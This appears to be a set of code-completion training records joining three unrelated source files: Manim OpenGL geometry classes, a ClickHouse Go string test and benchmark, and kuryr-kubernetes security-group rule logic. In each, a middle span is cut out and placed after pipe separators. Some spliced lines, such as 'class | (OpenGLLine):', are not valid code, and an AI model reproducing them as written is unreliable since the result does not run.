self.set_height(height, stretch=True)
class OpenGLAnnularSector(OpenGLArc):
def __init__(
self,
inner_radius=1,
outer_radius=2,
angle=TAU / 4,
start_angle=0,
fill_opacity=1,
stroke_width=0,
color=WHITE,
**kwargs
):
self.inner_radius = inner_radius
self.outer_radius = outer_radius
OpenGLArc.__init__(
self,
start_angle=start_angle,
angle=angle,
fill_opacity=fill_opacity,
stroke_width=stroke_width,
color=color,
**kwargs
)
def init_points(self):
inner_arc, outer_arc = (
OpenGLArc(
start_angle=self.start_angle,
angle=self.angle,
radius=radius,
arc_center=self.arc_center,
)
for radius in (self.inner_radius, self.outer_radius)
)
outer_arc.reverse_points()
self.append_points(inner_arc.points)
self.add_line_to(outer_arc.points[0])
self.append_points(outer_arc.points)
self.add_line_to(inner_arc.points[0])
class OpenGLSector(OpenGLAnnularSector):
def __init__(self, outer_radius=1, inner_radius=0, **kwargs):
OpenGLAnnularSector.__init__(
self, inner_radius=inner_radius, outer_radius=outer_radius, **kwargs
)
class OpenGLAnnulus(OpenGLCircle):
def __init__(
self,
inner_radius=1,
outer_radius=2,
fill_opacity=1,
stroke_width=0,
color=WHITE,
mark_paths_closed=False,
**kwargs
):
self.mark_paths_closed = mark_paths_closed # is this even used?
self.inner_radius = inner_radius
self.outer_radius = outer_radius
OpenGLCircle.__init__(
self,
fill_opacity=fill_opacity,
stroke_width=stroke_width,
color=color,
**kwargs
)
def init_points(self):
self.radius = self.outer_radius
outer_circle = OpenGLCircle(radius=self.outer_radius)
inner_circle = OpenGLCircle(radius=self.inner_radius)
inner_circle.reverse_points()
self.append_points(outer_circle.points)
self.append_points(inner_circle.points)
self.shift(self.arc_center)
class OpenGLLine(OpenGLTipableVMobject):
def __init__(self, start=LEFT, end=RIGHT, buff=0, path_arc=0, **kwargs):
self.dim = 3
self.buff = buff
self.path_arc = path_arc
self.set_start_and_end_attrs(start, end)
super().__init__(**kwargs)
def init_points(self):
self.set_points_by_ends(self.start, self.end, self.buff, self.path_arc)
def set_points_by_ends(self, start, end, buff=0, path_arc=0):
if path_arc:
self.set_points(OpenGLArc.create_quadratic_bezier_points(path_arc))
self.put_start_and_end_on(start, end)
else:
self.set_points_as_corners([start, end])
self.account_for_buff(self.buff)
def set_path_arc(self, new_value):
self.path_arc = new_value
self.init_points()
def account_for_buff(self, buff):
if buff == 0:
return
#
if self.path_arc == 0:
length = self.get_length()
else:
length = self.get_arc_length()
#
if length < 2 * buff:
return
buff_prop = buff / length
self.pointwise_become_partial(self, buff_prop, 1 - buff_prop)
return self
def set_start_and_end_attrs(self, start, end):
# If either start or end are Mobjects, this
# gives their centers
rough_start = self.pointify(start)
rough_end = self.pointify(end)
vect = normalize(rough_end - rough_start)
# Now that we know the direction between them,
# we can find the appropriate boundary point from
# start and end, if they're mobjects
self.start = self.pointify(start, vect) + self.buff * vect
self.end = self.pointify(end, -vect) - self.buff * vect
def pointify(self, mob_or_point, direction=None):
"""
Take an argument passed into Line (or subclass) and turn
it into a 3d point.
"""
if isinstance(mob_or_point, Mobject):
mob = mob_or_point
if direction is None:
return mob.get_center()
else:
return mob.get_continuous_bounding_box_point(direction)
else:
point = mob_or_point
result = np.zeros(self.dim)
result[: len(point)] = point
return result
def put_start_and_end_on(self, start, end):
curr_start, curr_end = self.get_start_and_end()
if (curr_start == curr_end).all():
self.set_points_by_ends(start, end, self.path_arc)
return super().put_start_and_end_on(start, end)
def get_vector(self):
return self.get_end() - self.get_start()
def get_unit_vector(self):
return normalize(self.get_vector())
def get_angle(self):
return angle_of_vector(self.get_vector())
def get_projection(self, point):
"""
Return projection of a point onto the line
"""
unit_vect = self.get_unit_vector()
start = self.get_start()
return start + np.dot(point - start, unit_vect) * unit_vect
def get_slope(self):
return np.tan(self.get_angle())
def set_angle(self, angle, about_point=None):
if about_point is None:
about_point = self.get_start()
self.rotate(
angle - self.get_angle(),
about_point=about_point,
)
return self
def set_length(self, length):
self.scale(length / self.get_length())
class OpenGLDashedLine(OpenGLLine):
@deprecated_params(
params="positive_space_ratio dash_spacing",
since="v0.9.0",
message="Use dashed_ratio instead of positive_space_ratio.",
)
def __init__(
self, *args, dash_length=DEFAULT_DASH_LENGTH, dashed_ratio=0.5, **kwargs
):
# Simplify with removal of deprecation warning
self.dash_spacing = kwargs.pop("dash_spacing", None) # Unused param
self.dashed_ratio = kwargs.pop("positive_space_ratio", None) or dashed_ratio
self.dash_length = dash_length
super().__init__(*args, **kwargs)
dashed_ratio = self.dashed_ratio
num_dashes = self.calculate_num_dashes(dashed_ratio)
dashes = OpenGLDashedVMobject(
self, num_dashes=num_dashes, dashed_ratio=dashed_ratio
)
self.clear_points()
self.add(*dashes)
def calculate_num_dashes(self, dashed_ratio):
return max(
2, int(np.ceil((self.get_length() / self.dash_length) * dashed_ratio))
)
def get_start(self):
if len(self.submobjects) > 0:
return self.submobjects[0].get_start()
else:
return OpenGLLine.get_start(self)
def get_end(self):
if len(self.submobjects) > 0:
return self.submobjects[-1].get_end()
else:
return OpenGLLine.get_end(self)
def get_first_handle(self):
return self.submobjects[0].points[1]
def get_last_handle(self):
return self.submobjects[-1].points[-2]
class OpenGLTangentLine(OpenGLLine):
def __init__(self, vmob, alpha, length=1, d_alpha=1e-6, **kwargs):
self.length = length
self.d_alpha = d_alpha
da = self.d_alpha
a1 = clip(alpha - da, 0, 1)
a2 = clip(alpha + da, 0, 1)
super().__init__(vmob.pfp(a1), vmob.pfp(a2), **kwargs)
self.scale(self.length / self.get_length())
class OpenGLElbow(OpenGLVMobject):
def __init__(self, width=0.2, angle=0, **kwargs):
self.angle = angle
super().__init__(self, **kwargs)
self.set_points_as_corners([UP, UP + RIGHT, RIGHT])
self.set_width(width, about_point=ORIGIN)
self.rotate(self.angle, about_point=ORIGIN)
class | (OpenGLLine):
def __init__(
self,
start=LEFT,
end=RIGHT,
path_arc=0,
fill_color=GREY_A,
fill_opacity=1,
stroke_width=0,
buff=MED_SMALL_BUFF,
thickness=0.05,
tip_width_ratio=5,
tip_angle=PI / 3,
max_tip_length_to_length_ratio=0.5,
max_width_to_length_ratio=0.1,
**kwargs
):
self.thickness = thickness
self.tip_width_ratio = tip_width_ratio
self.tip_angle = tip_angle
self.max_tip_length_to_length_ratio = max_tip_length_to_length_ratio
self.max_width_to_length_ratio = max_width_to_length_ratio
super().__init__(
start=start,
end=end,
buff=buff,
path_arc=path_arc,
fill_color=fill_color,
fill_opacity=fill_opacity,
stroke_width=stroke_width,
**kwargs
)
def set_points_by_ends(self, start, end, buff=0, path_arc=0):
# Find the right tip length and thickness
vect = end - start
length = max(np.linalg.norm(vect), 1e-8)
thickness = self.thickness
w_ratio = fdiv(self.max_width_to_length_ratio, fdiv(thickness, length))
if w_ratio < 1:
thickness *= w_ratio
tip_width = self.tip_width_ratio * thickness
tip_length = tip_width / (2 * np.tan(self.tip_angle / 2))
t_ratio = fdiv(self.max_tip_length_to_length_ratio, fdiv(tip_length, length))
if t_ratio < 1:
tip_length *= t_ratio
tip_width *= t_ratio
# Find points for the stem
if path_arc == 0:
points1 = (length - tip_length) * np.array([RIGHT, 0.5 * RIGHT, ORIGIN])
points1 += thickness * UP / 2
points2 = points1[::-1] + thickness * DOWN
else:
# Solve for radius so that the tip-to-tail length matches |end - start|
a = 2 * (1 - np.cos(path_arc))
b = -2 * tip_length * np.sin(path_arc)
c = tip_length ** 2 - length ** 2
R = (-b + np.sqrt(b ** 2 - 4 * a * c)) / (2 * a)
# Find arc points
points1 = OpenGLArc.create_quadratic_bezier_points(path_arc)
points2 = np.array(points1[::-1])
points1 *= R + thickness / 2
points2 *= R - thickness / 2
if path_arc < 0:
tip_length *= -1
rot_T = rotation_matrix_transpose(PI / 2 - path_arc, OUT)
for points in points1, points2:
points[:] = np.dot(points, rot_T)
points += R * DOWN
self.set_points(points1)
# Tip
self.add_line_to(tip_width * UP / 2)
self.add_line_to(tip_length * LEFT)
self.tip_index = len(self.points) - 1
self.add_line_to(tip_width * DOWN / 2)
self.add_line_to(points2[0])
# Close it out
self.append_points(points2)
self.add_line_to(points1[0])
if length > 0:
# Final correction
super().scale(length / self.get_length())
self.rotate(angle_of_vector(vect) - self.get_angle())
self.rotate(
PI / 2 - np.arccos(normalize(vect)[2]),
axis=rotate_vector(self.get_unit_vector(), -PI / 2),
)
self.shift(start - self.get_start())
self.refresh_triangulation()
def reset_points_around_ends(self):
self.set_points_by_ends(
self.get_start(), self.get_end(), path_arc=self.path_arc
)
return self
def get_start(self):
nppc = self.n_points_per_curve
points = self.points
return (points[0] + points[-nppc]) / 2
def get_end(self):
return self.points[self.tip_index]
def put_start_and_end_on(self, start, end):
self.set_points_by_ends(start, end, buff=0, path_arc=self.path_arc)
return self
def scale(self, *args, **kwargs):
super().scale(*args, **kwargs)
self.reset_points_around_ends()
return self
def set_thickness(self, thickness):
self.thickness = thickness
self.reset_points_around_ends()
return self
def set_path_arc(self, path_arc):
self.path_arc = path_arc
self.reset_points_around_ends()
return self
class OpenGLVector(OpenGLArrow):
def __init__(self, direction=RIGHT, buff=0, **kwargs):
self.buff = buff
if len(direction) == 2:
direction = np.hstack([direction, 0])
super().__init__(ORIGIN, direction, buff=buff, **kwargs)
class OpenGLDoubleArrow(OpenGLArrow):
def __init__(self, *args, **kwargs):
OpenGLArrow.__init__(self, *args, **kwargs)
self.add_tip(at_start=True)
class OpenGLCubicBezier(OpenGLVMobject):
def __init__(self, a0, h0, h1, a1, **kwargs):
OpenGLVMobject.__init__(self, **kwargs)
self.add_cubic_bezier_curve(a0, h0, h1, a1)
class OpenGLPolygon(OpenGLVMobject):
def __init__(self, *vertices, **kwargs):
self.vertices = vertices
super().__init__(**kwargs)
def init_points(self):
verts = self.vertices
self.set_points_as_corners([*verts, verts[0]])
def get_vertices(self):
return self.get_start_anchors()
def round_corners(self, radius=0.5):
vertices = self.get_vertices()
arcs = []
for v1, v2, v3 in adjacent_n_tuples(vertices, 3):
vect1 = v2 - v1
vect2 = v3 - v2
unit_vect1 = normalize(vect1)
unit_vect2 = normalize(vect2)
angle = angle_between_vectors(vect1, vect2)
# Negative radius gives concave curves
angle *= np.sign(radius)
# Distance between vertex and start of the arc
cut_off_length = radius * np.tan(angle / 2)
# Determines counterclockwise vs. clockwise
sign = np.sign(np.cross(vect1, vect2)[2])
arc = OpenGLArcBetweenPoints(
v2 - unit_vect1 * cut_off_length,
v2 + unit_vect2 * cut_off_length,
angle=sign * angle,
n_components=2,
)
arcs.append(arc)
self.clear_points()
# To ensure that we loop through starting with last
arcs = [arcs[-1], *arcs[:-1]]
for arc1, arc2 in adjacent_pairs(arcs):
self.append_points(arc1.points)
line = OpenGLLine(arc1.get_end(), arc2.get_start())
# Make sure anchors are evenly distributed
len_ratio = line.get_length() / arc1.get_arc_length()
line.insert_n_curves(int(arc1.get_num_curves() * len_ratio))
self.append_points(line.points)
return self
class OpenGLRegularPolygon(OpenGLPolygon):
def __init__(self, n=6, start_angle=None, **kwargs):
self.start_angle = start_angle
if self.start_angle is None:
if n % 2 == 0:
self.start_angle = 0
else:
self.start_angle = 90 * DEGREES
start_vect = rotate_vector(RIGHT, self.start_angle)
vertices = compass_directions(n, start_vect)
super().__init__(*vertices, **kwargs)
class OpenGLTriangle(OpenGLRegularPolygon):
def __init__(self, **kwargs):
super().__init__(n=3, **kwargs)
class OpenGLArrowTip(OpenGLTriangle):
def __init__(
self,
fill_opacity=1,
fill_color=WHITE,
stroke_width=0,
width=DEFAULT_ARROW_TIP_WIDTH,
length=DEFAULT_ARROW_TIP_LENGTH,
angle=0,
**kwargs
):
OpenGLTriangle.__init__(
self,
start_angle=0,
fill_opacity=fill_opacity,
fill_color=fill_color,
stroke_width=stroke_width,
**kwargs
)
self.set_width(width, stretch=True)
self.set_height(length, stretch=True)
def get_base(self):
return self.point_from_proportion(0.5)
def get_tip_point(self):
return self.points[0]
def get_vector(self):
return self.get_tip_point() - self.get_base()
def get_angle(self):
return angle_of_vector(self.get_vector())
def get_length(self):
return np.linalg.norm(self.get_vector())
class OpenGLRectangle(OpenGLPolygon):
def __init__(self, color=WHITE, width=4.0, height=2.0, **kwargs):
OpenGLPolygon.__init__(self, UR, UL, DL, DR, color=color, **kwargs)
self.set_width(width, stretch=True)
self.set_height(height, stretch=True)
class OpenGLSquare(OpenGLRectangle):
def __init__(self, side_length=2.0, **kwargs):
self.side_length = side_length
super().__init__(height=side_length, width=side_length, **kwargs)
class OpenGLRoundedRectangle(OpenGLRectangle):
def __init__(self, corner_radius=0.5, **kwargs):
self.corner_radius = corner_radius
OpenGLRectangle.__init__(self, **kwargs)
self.round_corners(self.corner_radius)
| OpenGLArrow |
string_test.go | // Licensed to ClickHouse, Inc. under one or more contributor
// license agreements. See the NOTICE file distributed with
// this work for additional information regarding copyright
// ownership. ClickHouse, Inc. licenses this file to you under
// the Apache License, Version 2.0 (the "License"); you may
// not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
package tests
import (
"context"
"testing"
"github.com/ClickHouse/clickhouse-go/v2"
"github.com/stretchr/testify/assert"
)
func TestSimpleString(t *testing.T) {
var (
ctx = context.Background()
conn, err = clickhouse.Open(&clickhouse.Options{
Addr: []string{"127.0.0.1:9000"},
Auth: clickhouse.Auth{
Database: "default",
Username: "default",
Password: "",
},
Compression: &clickhouse.Compression{
Method: clickhouse.CompressionLZ4,
},
})
)
if assert.NoError(t, err) {
if err := checkMinServerVersion(conn, 21, 9, 0); err != nil {
t.Skip(err.Error()) | return
}
const ddl = `
CREATE TABLE test_string (
Col1 String
) Engine Memory
`
defer func() {
conn.Exec(ctx, "DROP TABLE test_string")
}()
if err := conn.Exec(ctx, ddl); assert.NoError(t, err) {
if batch, err := conn.PrepareBatch(ctx, "INSERT INTO test_string"); assert.NoError(t, err) {
if err := batch.Append("A"); assert.NoError(t, err) {
if assert.NoError(t, batch.Send()) {
}
}
}
}
}
}
func TestString(t *testing.T) {
var (
ctx = context.Background()
conn, err = clickhouse.Open(&clickhouse.Options{
Addr: []string{"127.0.0.1:9000"},
Auth: clickhouse.Auth{
Database: "default",
Username: "default",
Password: "",
},
Compression: &clickhouse.Compression{
Method: clickhouse.CompressionLZ4,
},
})
)
if assert.NoError(t, err) {
if err := checkMinServerVersion(conn, 21, 9, 0); err != nil {
t.Skip(err.Error())
return
}
const ddl = `
CREATE TABLE test_string (
Col1 String
, Col2 Array(String)
, Col3 Nullable(String)
) Engine Memory
`
defer func() {
conn.Exec(ctx, "DROP TABLE test_string")
}()
if err := conn.Exec(ctx, ddl); assert.NoError(t, err) {
if batch, err := conn.PrepareBatch(ctx, "INSERT INTO test_string"); assert.NoError(t, err) {
if err := batch.Append("A", []string{"A", "B", "C"}, nil); assert.NoError(t, err) {
if assert.NoError(t, batch.Send()) {
var (
col1 string
col2 []string
col3 *string
)
if err := conn.QueryRow(ctx, "SELECT * FROM test_string").Scan(&col1, &col2, &col3); assert.NoError(t, err) {
if assert.Nil(t, col3) {
assert.Equal(t, "A", col1)
assert.Equal(t, []string{"A", "B", "C"}, col2)
}
}
}
}
}
}
}
}
func BenchmarkString(b *testing.B) {
var (
ctx = context.Background()
conn, err = clickhouse.Open(&clickhouse.Options{
Addr: []string{"127.0.0.1:9000"},
Auth: clickhouse.Auth{
Database: "default",
Username: "default",
Password: "",
},
})
)
if err != nil {
b.Fatal(err)
}
defer func() {
conn.Exec(ctx, "DROP TABLE benchmark_string")
}()
if err = conn.Exec(ctx, `CREATE TABLE benchmark_string (Col1 UInt64, Col2 String) ENGINE = Null`); err != nil {
b.Fatal(err)
}
const rowsInBlock = 10_000_000
for n := 0; n < b.N; n++ {
batch, err := conn.PrepareBatch(ctx, "INSERT INTO benchmark_string VALUES")
if err != nil {
b.Fatal(err)
}
for i := 0; i < rowsInBlock; i++ {
if err := batch.Append(uint64(1), "test"); err != nil {
b.Fatal(err)
}
}
if err = batch.Send(); err != nil {
b.Fatal(err)
}
}
}
func BenchmarkColumnarString(b *testing.B) {
var (
ctx = context.Background()
conn, err = clickhouse.Open(&clickhouse.Options{
Addr: []string{"127.0.0.1:9000"},
Auth: clickhouse.Auth{
Database: "default",
Username: "default",
Password: "",
},
})
)
if err != nil {
b.Fatal(err)
}
defer func() {
conn.Exec(ctx, "DROP TABLE benchmark_string")
}()
if err = conn.Exec(ctx, `CREATE TABLE benchmark_string (Col1 UInt64, Col2 String) ENGINE = Null`); err != nil {
b.Fatal(err)
}
const rowsInBlock = 10_000_000
var (
col1 []uint64
col2 []string
)
for n := 0; n < b.N; n++ {
batch, err := conn.PrepareBatch(ctx, "INSERT INTO benchmark_string VALUES")
if err != nil {
b.Fatal(err)
}
col1 = col1[:0]
col2 = col2[:0]
for i := 0; i < rowsInBlock; i++ {
col1 = append(col1, uint64(1))
col2 = append(col2, "test")
}
if err := batch.Column(0).Append(col1); err != nil {
b.Fatal(err)
}
if err := batch.Column(1).Append(col2); err != nil {
b.Fatal(err)
}
if err = batch.Send(); err != nil {
b.Fatal(err)
}
}
} | |
network_policy_security_groups.py | # Copyright 2018 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from kuryr_kubernetes import clients
from kuryr_kubernetes import config
from kuryr_kubernetes import constants
from kuryr_kubernetes.controller.drivers import base
from kuryr_kubernetes.controller.drivers import utils as driver_utils
from kuryr_kubernetes import exceptions
from oslo_config import cfg
from oslo_log import log as logging
LOG = logging.getLogger(__name__)
def _get_namespace_labels(namespace):
kubernetes = clients.get_kubernetes_client()
try:
path = '{}/{}'.format(
constants.K8S_API_NAMESPACES, namespace)
LOG.debug("K8s API Query %s", path)
namespaces = kubernetes.get(path)
LOG.debug("Return Namespace: %s", namespaces)
except exceptions.K8sResourceNotFound:
LOG.exception("Namespace not found")
raise
except exceptions.K8sClientException:
LOG.exception("Kubernetes Client Exception")
raise
return namespaces['metadata'].get('labels')
def _create_sg_rule(sg_id, direction, cidr, port=None, namespace=None):
if port:
sg_rule = driver_utils.create_security_group_rule_body(
sg_id, direction, port.get('port'),
protocol=port.get('protocol'), cidr=cidr, namespace=namespace)
else:
sg_rule = driver_utils.create_security_group_rule_body(
sg_id, direction, port_range_min=1,
port_range_max=65535, cidr=cidr, namespace=namespace)
sgr_id = driver_utils.create_security_group_rule(sg_rule)
sg_rule['security_group_rule']['id'] = sgr_id
return sg_rule
def _get_crd_rule(crd_rules, container_port):
"""Returns a CRD rule that matches a container port
Retrieves the CRD rule that contains a given port in
the range of the rule ports.
"""
for crd_rule in crd_rules:
remote_ip_prefixes = crd_rule.get('remote_ip_prefixes')
min_port = crd_rule['security_group_rule'].get('port_range_min')
max_port = crd_rule['security_group_rule'].get('port_range_max')
if (remote_ip_prefixes and (
min_port >= container_port and
container_port <= max_port)):
return crd_rule
def _create_sg_rules_with_container_ports(matched_pods, container_ports,
allow_all, namespace, matched,
crd_rules, sg_id, direction,
port, rule_selected_pod):
"""Create security group rules based on container ports
If it's an allow from/to everywhere rule or a rule with a
NamespaceSelector, updates a sg rule that might already exist
and match the named port or creates a new one with the
remote_ip_prefixes field containing the matched pod info.
Otherwise, creates rules for each container port without
a remote_ip_prefixes field.
param matched_pods: List of dicts where the key is a container
port and value is the pods that have the port
param container_ports: List of tuples with pods and port values
param allow_all: True is it's an allow from/to everywhere rule,
False otherwise.
param namespace: Namespace name
param matched: If a sg rule was created for the NP rule
param crd_rules: List of sg rules to update when patching the CRD
param sg_id: ID of the security group
param direction: String representing rule direction, ingress or egress
param port: Dict containing port and protocol
param rule_selected_pod: K8s Pod object selected by the rules selectors
return: True if a sg rule was created, False otherwise.
"""
for pod, container_port in container_ports:
pod_namespace = pod['metadata']['namespace']
pod_ip = driver_utils.get_pod_ip(pod)
if not pod_ip:
LOG.debug("Skipping SG rule creation for pod %s due to "
"no IP assigned", pod['metadata']['name'])
continue
pod_info = {pod_ip: pod_namespace}
matched = True
if allow_all or namespace:
crd_rule = _get_crd_rule(crd_rules, container_port)
if crd_rule:
crd_rule['remote_ip_prefixes'].update(pod_info)
else:
if container_port in matched_pods:
matched_pods[container_port].update(pod_info)
else:
matched_pods[container_port] = pod_info
else:
pod_ip = driver_utils.get_pod_ip(rule_selected_pod)
if not pod_ip:
LOG.debug("Skipping SG rule creation for pod %s due to no IP "
"assigned", rule_selected_pod['metadata']['name'])
continue
sg_rule = driver_utils.create_security_group_rule_body(
sg_id, direction, container_port,
protocol=port.get('protocol'),
cidr=pod_ip, pods=pod_info)
sgr_id = driver_utils.create_security_group_rule(sg_rule)
sg_rule['security_group_rule']['id'] = sgr_id
if sg_rule not in crd_rules:
crd_rules.append(sg_rule)
return matched
def _create_sg_rule_on_text_port(sg_id, direction, port, rule_selected_pods,
crd_rules, matched, crd,
allow_all=False, namespace=None):
matched_pods = {}
spec_pod_selector = crd['spec'].get('podSelector')
policy_namespace = crd['metadata']['namespace']
spec_pods = driver_utils.get_pods(
spec_pod_selector, policy_namespace).get('items')
if direction == 'ingress':
for spec_pod in spec_pods:
container_ports = driver_utils.get_ports(spec_pod, port)
for rule_selected_pod in rule_selected_pods:
matched = _create_sg_rules_with_container_ports(
matched_pods, container_ports, allow_all, namespace,
matched, crd_rules, sg_id, direction, port,
rule_selected_pod)
elif direction == 'egress':
for rule_selected_pod in rule_selected_pods:
pod_label = rule_selected_pod['metadata'].get('labels')
pod_ns = rule_selected_pod['metadata'].get('namespace')
# NOTE(maysams) Do not allow egress traffic to the actual
# set of pods the NP is enforced on.
if (driver_utils.match_selector(spec_pod_selector, pod_label) and
policy_namespace == pod_ns):
continue
container_ports = driver_utils.get_ports(
rule_selected_pod, port)
matched = _create_sg_rules_with_container_ports(
matched_pods, container_ports, allow_all,
namespace, matched, crd_rules, sg_id, direction,
port, rule_selected_pod)
for container_port, pods in matched_pods.items():
if allow_all:
sg_rule = driver_utils.create_security_group_rule_body(
sg_id, direction, container_port,
protocol=port.get('protocol'),
pods=pods)
else:
namespace_obj = driver_utils.get_namespace(namespace)
namespace_cidr = driver_utils.get_namespace_subnet_cidr(
namespace_obj)
sg_rule = driver_utils.create_security_group_rule_body(
sg_id, direction, container_port,
protocol=port.get('protocol'), cidr=namespace_cidr,
pods=pods)
sgr_id = driver_utils.create_security_group_rule(sg_rule)
sg_rule['security_group_rule']['id'] = sgr_id
crd_rules.append(sg_rule)
return matched
def _create_sg_rules(crd, pod, pod_selector, rule_block,
crd_rules, direction, matched, namespace=None,
allow_all=False):
pod_labels = pod['metadata'].get('labels')
pod_ip = driver_utils.get_pod_ip(pod)
if not pod_ip:
LOG.debug("Skipping SG rule creation for pod %s due to "
"no IP assigned", pod['metadata']['name'])
return None
# NOTE (maysams) No need to differentiate between podSelector
# with empty value or with '{}', as they have same result in here.
if pod_selector:
if driver_utils.match_selector(pod_selector, pod_labels):
sg_id = crd['spec']['securityGroupId']
if 'ports' in rule_block:
for port in rule_block['ports']:
if type(port.get('port')) is not int:
matched = _create_sg_rule_on_text_port(
sg_id, direction, port, [pod],
crd_rules, matched, crd)
else:
matched = True
sg_rule = _create_sg_rule(
sg_id, direction, cidr=pod_ip, port=port,
namespace=namespace)
crd_rules.append(sg_rule)
else:
matched = True
sg_rule = _create_sg_rule(
sg_id, direction, cidr=pod_ip, namespace=namespace)
crd_rules.append(sg_rule)
else:
# NOTE (maysams) When a policy with namespaceSelector and text port
# is applied the port on the pods needs to be retrieved.
sg_id = crd['spec']['securityGroupId']
if 'ports' in rule_block:
for port in rule_block['ports']:
if type(port.get('port')) is not int:
matched = (
_create_sg_rule_on_text_port(
sg_id, direction, port, [pod],
crd_rules, matched, crd,
allow_all=allow_all, namespace=namespace))
return matched
def _parse_selectors_on_pod(crd, pod, pod_selector, namespace_selector,
rule_block, crd_rules, direction, matched):
pod_namespace = pod['metadata']['namespace']
pod_namespace_labels = _get_namespace_labels(pod_namespace)
policy_namespace = crd['metadata']['namespace']
if namespace_selector == {}:
matched = _create_sg_rules(crd, pod, pod_selector, rule_block,
crd_rules, direction, matched,
allow_all=True)
elif namespace_selector:
if (pod_namespace_labels and
driver_utils.match_selector(namespace_selector,
pod_namespace_labels)):
matched = _create_sg_rules(crd, pod, pod_selector,
rule_block, crd_rules,
direction, matched,
namespace=pod_namespace)
else:
if pod_namespace == policy_namespace:
matched = _create_sg_rules(crd, pod, pod_selector, rule_block,
crd_rules, direction, matched,
namespace=pod_namespace)
return matched, crd_rules
def _parse_selectors_on_namespace(crd, direction, pod_selector,
ns_selector, rule_block, crd_rules,
namespace, matched):
ns_name = namespace['metadata'].get('name')
ns_labels = namespace['metadata'].get('labels')
sg_id = crd['spec']['securityGroupId']
if (ns_selector and ns_labels and
driver_utils.match_selector(ns_selector, ns_labels)):
if pod_selector:
pods = driver_utils.get_pods(pod_selector, ns_name).get('items')
if 'ports' in rule_block:
for port in rule_block['ports']:
if type(port.get('port')) is not int:
matched = (
_create_sg_rule_on_text_port(
sg_id, direction, port, pods,
crd_rules, matched, crd)) | matched = True
for pod in pods:
pod_ip = driver_utils.get_pod_ip(pod)
if not pod_ip:
pod_name = pod['metadata']['name']
LOG.debug("Skipping SG rule creation for pod "
"%s due to no IP assigned", pod_name)
continue
crd_rules.append(_create_sg_rule(
sg_id, direction, pod_ip, port=port,
namespace=ns_name))
else:
for pod in pods:
pod_ip = driver_utils.get_pod_ip(pod)
if not pod_ip:
pod_name = pod['metadata']['name']
LOG.debug("Skipping SG rule creation for pod %s due"
" to no IP assigned", pod_name)
continue
matched = True
crd_rules.append(_create_sg_rule(
sg_id, direction, pod_ip,
namespace=ns_name))
else:
ns_pods = driver_utils.get_pods(ns_selector)
ns_cidr = driver_utils.get_namespace_subnet_cidr(namespace)
if 'ports' in rule_block:
for port in rule_block['ports']:
if type(port.get('port')) is not int:
matched = (
_create_sg_rule_on_text_port(
sg_id, direction, port, ns_pods,
crd_rules, matched, crd))
else:
matched = True
crd_rules.append(_create_sg_rule(
sg_id, direction, ns_cidr,
port=port, namespace=ns_name))
else:
matched = True
crd_rules.append(_create_sg_rule(
sg_id, direction, ns_cidr,
namespace=ns_name))
return matched, crd_rules
def _parse_rules(direction, crd, pod=None, namespace=None):
policy = crd['spec']['networkpolicy_spec']
rule_direction = 'from'
crd_rules = crd['spec'].get('ingressSgRules')
if direction == 'egress':
rule_direction = 'to'
crd_rules = crd['spec'].get('egressSgRules')
matched = False
rule_list = policy.get(direction, [])
for rule_block in rule_list:
for rule in rule_block.get(rule_direction, []):
namespace_selector = rule.get('namespaceSelector')
pod_selector = rule.get('podSelector')
if pod:
matched, crd_rules = _parse_selectors_on_pod(
crd, pod, pod_selector, namespace_selector,
rule_block, crd_rules, direction, matched)
elif namespace:
matched, crd_rules = _parse_selectors_on_namespace(
crd, direction, pod_selector, namespace_selector,
rule_block, crd_rules, namespace, matched)
# NOTE(maysams): Cover the case of a network policy that allows
# from everywhere on a named port, e.g., when there is no 'from'
# specified.
if pod and not matched:
for port in rule_block.get('ports', []):
if type(port.get('port')) is not int:
sg_id = crd['spec']['securityGroupId']
if (not rule_block.get(rule_direction, [])
or direction == "ingress"):
matched = (_create_sg_rule_on_text_port(
sg_id, direction, port, [pod],
crd_rules, matched, crd,
allow_all=True))
return matched, crd_rules
def _parse_rules_on_delete_namespace(rule_list, direction, ns_name):
matched = False
rules = []
for rule in rule_list:
LOG.debug('Parsing %(dir)s Rule %(r)s', {'dir': direction,
'r': rule})
rule_namespace = rule.get('namespace', None)
remote_ip_prefixes = rule.get('remote_ip_prefixes', [])
if rule_namespace and rule_namespace == ns_name:
matched = True
driver_utils.delete_security_group_rule(
rule['security_group_rule']['id'])
for remote_ip, namespace in remote_ip_prefixes:
if namespace == ns_name:
matched = True
remote_ip_prefixes.pop(remote_ip)
if remote_ip_prefixes:
rule['remote_ip_prefixes'] = remote_ip_prefixes
rules.append(rule)
else:
rules.append(rule)
return matched, rules
def _parse_rules_on_delete_pod(rule_list, direction, pod_ip):
matched = False
rules = []
for rule in rule_list:
LOG.debug('Parsing %(dir)s Rule %(r)s', {'dir': direction,
'r': rule})
remote_ip_prefix = rule['security_group_rule'].get(
'remote_ip_prefix')
remote_ip_prefixes = rule.get('remote_ip_prefixes', [])
if remote_ip_prefix and remote_ip_prefix == pod_ip:
matched = True
driver_utils.delete_security_group_rule(
rule['security_group_rule']['id'])
elif remote_ip_prefixes:
if pod_ip in remote_ip_prefixes:
matched = True
remote_ip_prefixes.pop(pod_ip)
if remote_ip_prefixes:
rule['remote_ip_prefixes'] = remote_ip_prefixes
rules.append(rule)
else:
rules.append(rule)
return matched, rules
def _get_pod_sgs(pod, project_id):
sg_list = []
pod_labels = pod['metadata'].get('labels')
pod_namespace = pod['metadata']['namespace']
knp_crds = driver_utils.get_kuryrnetpolicy_crds(
namespace=pod_namespace)
for crd in knp_crds.get('items'):
pod_selector = crd['spec'].get('podSelector')
if pod_selector:
if driver_utils.match_selector(pod_selector, pod_labels):
LOG.debug("Appending %s",
str(crd['spec']['securityGroupId']))
sg_list.append(str(crd['spec']['securityGroupId']))
else:
LOG.debug("Appending %s", str(crd['spec']['securityGroupId']))
sg_list.append(str(crd['spec']['securityGroupId']))
# NOTE(maysams) Pods that are not selected by any Networkpolicy
